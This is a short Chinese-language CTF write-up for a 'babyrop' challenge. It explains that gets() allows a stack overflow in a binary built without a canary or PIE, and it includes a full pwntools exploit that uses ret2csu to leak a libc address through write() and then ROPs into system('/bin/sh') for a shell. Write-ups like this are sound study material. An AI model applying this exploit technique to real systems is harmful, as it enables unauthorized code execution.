检查一下保护机制:
没有开启canary和pie,栈溢出少了很多麻烦
ida看下程序逻辑:
gets函数导致栈溢出,可惜只有write函数作为输出,
本地可以写常用的rop,调用write函数泄露地址,但是远程的rdx好像为0,因此采用ret2csu的办法去泄露地址,拿到地址后接着写rop,执行system("/bin/sh")去get shell
利用代码是这样的:
from pwn import * context.log_level="debug" sh=process("./babyrop") #sh=gdb.debug("./babyrop") #sh=remote("dicec.tf",31924) elf=ELF("./babyrop") pop_rdi=p64(0x4011d3) ret=p64(0x40101a) csu_front_addr = 0x4011b0 csu_end_addr = 0x4011ca def csu(rbx, rbp, r12, r13, r14, r15, last): # rbx=0 # rbp=1 # rdi=r12 # rsi=r13 # rdx=r14 # call=*r15 # last =ret_addr payload = b'a' * 0x40 + b'b' * 8 payload += p64(csu_end_addr) + p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15) payload += p64(csu_front_addr) payload += b'a' * 0x38 payload += p64(last) sh.sendline(payload) sleep(1) sh.recvuntil('name: ') # write(1,write_got,8) csu(0, 1, 1, elf.got['write'], 8, elf.got['write'], elf.sym['main']) libc_write = u64(sh.recv(8)) libc_base=libc_write-0x1111d0 sys=libc_base+0x055410 binsh=libc_base+0x1b75aa info(hex(libc_write)) info(hex(libc_base)) payload=b'a'*0x48+pop_rdi+p64(binsh)+ret+p64(sys) sh.sendlineafter('name',payload) sh.interactive()